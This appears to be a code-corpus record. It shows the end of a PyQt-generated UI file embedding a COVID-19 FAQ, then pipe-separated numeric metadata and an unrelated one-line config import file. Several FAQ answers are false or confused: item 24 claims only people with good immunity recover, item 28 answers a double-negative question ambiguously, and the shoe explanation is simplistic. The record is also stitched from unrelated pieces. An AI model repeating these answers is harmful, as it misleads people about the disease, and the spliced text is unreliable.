"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">22. Does Water or swimming not transmit the COVID-19 virus?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->The COVID-19 virus does not transmit through water while swimming. However, the virus spreads between people when someone has close contact with an infected person.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">23. Is The likelihood of shoes spreading COVID-19 is veryLow?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Shoes don\'t spread covid as they won\'t come in contact with others.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">24. Do Most people who get COVID-19 recover from it?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Only the people having good immunity are recovered.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">26. Can Thermal scanners NOT detect COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Thermal scanner detects only one of the symptoms of the covid but not the whole disease.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">27. Does Adding pepper to your soup or other meals NOTprevent or cure COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->No connection between adding pepper to soup and covid.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">28. Is COVID-19 NOT transmitted through houseflies?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->No, it is not.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">29. Do 5G mobile networks NOT spread COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->There is no connections between covid and network.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">30. Does Catching COVID-19 NOT mean you will have it for life?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Yes, it is not remain with you for life.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p></body></html>"))
# Compiled Qt resource module (typically generated by pyrcc5); must be importable at runtime.
import resources_rc


if __name__ == "__main__":
    import sys

    # Standalone preview: build a widget, apply the generated layout, and start the event loop.
    app = QtWidgets.QApplication(sys.argv)
    Form = QtWidgets.QWidget()
    ui = Ui_Form()
    ui.setupUi(Form)
    Form.show()
    sys.exit(app.exec_())
| 96.277778
| 419
| 0.689267
| 5,391
| 34,660
| 4.419032
| 0.090521
| 0.107669
| 0.047853
| 0.071779
| 0.775889
| 0.758679
| 0.74533
| 0.740797
| 0.730974
| 0.714016
| 0
| 0.038936
| 0.096711
| 34,660
| 359
| 420
| 96.545961
| 0.721988
| 0.007934
| 0
| 0.44898
| 1
| 0.055394
| 0.331443
| 0.052477
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005831
| false
| 0.005831
| 0.008746
| 0
| 0.017493
| 0
| 0
| 0
| 0
| null
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6
| eb3a4a59e6b2621ee019384ad58926b119852e1b
| 44
| py
| Python
| L3A_Physical/pytorch/config/__init__.py
| MingjieWang0606/L3A
| 6f01482826f27246a762cadf57f54906e14135e4
| ["MIT"]
| 34
| 2021-07-30T22:19:17.000Z
| 2022-03-24T03:49:19.000Z
| L3A_Physical/pytorch/config/__init__.py
| MingjieWang0606/L3A
| 6f01482826f27246a762cadf57f54906e14135e4
| ["MIT"]
| 6
| 2021-08-31T08:27:07.000Z
| 2022-03-28T09:20:11.000Z
| L3A_Physical/pytorch/config/__init__.py
| MingjieWang0606/L3A
| 6f01482826f27246a762cadf57f54906e14135e4
| ["MIT"]
| 9
| 2021-08-16T07:24:43.000Z
| 2022-01-27T02:36:57.000Z
| from .config import * #pylint: disable=W0401
| 44
| 44
| 0.772727
| 6
| 44
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 0.113636
| 44
| 1
| 44
| 44
| 0.769231
| 0.477273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 6
|